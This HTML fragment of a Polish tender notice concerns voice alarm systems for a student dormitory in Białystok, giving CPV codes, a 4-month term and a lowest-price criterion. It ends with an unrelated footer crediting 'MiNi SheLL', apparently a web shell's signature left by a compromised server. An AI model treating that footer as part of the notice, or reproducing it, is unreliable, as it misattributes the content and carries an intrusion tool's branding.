<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zaprojektowanie i wykonanie dźwiękowych systemów ostrzegawczych w budynku Domu  Studenta Nr 2 w Białymstoku, ul. Waszyngtona 23
wraz ze sprawowaniem nadzoru autorskiego w trakcie realizacji robót..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 74.23.21.00-5, 45.31.21.00-8, 50.34.00.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com